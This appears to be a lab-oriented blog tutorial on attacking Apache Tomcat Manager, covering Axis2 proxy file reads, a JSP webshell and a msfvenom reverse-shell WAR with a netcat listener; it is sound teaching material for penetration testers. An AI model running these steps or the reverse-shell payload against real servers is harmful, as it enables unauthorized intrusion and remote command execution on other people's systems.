To exploit tomcat manager you often need credentials. These can be the default username and password a lazy admin has left behind or they can be virtually impossible to crack.
This tutorial will show you common techniques to exploit tomcat manager without needing to use Metasploit.
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
Table of Contents
What You Will Learn
- How to exploit Tomcat Manager without Metasploit
- Exploit the Axis2 web service
- Deploy a payload to get a reverse shell
- How to use netcat to get a JSP reverse shell
Exploit Axis2 Web Service
Alot of the exploitation methods for tomcat manager require credentials. These can be guessed or bruteforced but how often is that the case?
Instead what you can do is check to see if the Apache Axis2 web service is running which acts as a front end proxy to the tomcat service.
There is already a vulnhub machine with the Axis2 web service as a vulnerability so you can follow my walkthrough.
Basically what is required is to abuse the ProxyService endpoint to query files that should not be accessible by anyone besides the admins.
As you can see I can view the tomcat-users.xml configuration file by exploiting the weakness found in the get parameter for this particular endpoint.
Create WAR Payload Using Msfvenom
Before I deploy a .war file to execute I have to first create the file.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.2 LPORT=1234 -f war > shell.warExploit Tomcat Manager Without Using Metasploit
Start a netcat listener to receive the nonstaged payload. To execute the payload once it is deployed simply click on the context path (/warshell) in the tomcat manager console.
You can also visit the path in the URL and it will execute the web shell that way as well.
Upload A JSP Webshell
Just as I can upload a web shell for a web server that executes PHP, think Drupal, WordPress, etc I can upload a web shell for the Java-based Apache webserver.
First I need to create a webshell in Java and then upload it to the console as a .war file. After that I simply execute the shell and supply it commands to run as bash on the target.
To launch my new web shell I click on the context path, /webshell, and it takes me to a page where I can give it commands.
You can see how the command I have chosen, id, has just run on the target thanks to my new deployed .war file.
Typhoon Vulnhub Machine
In another similar example there is an instance of default credentials used for the tomcat manager.
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.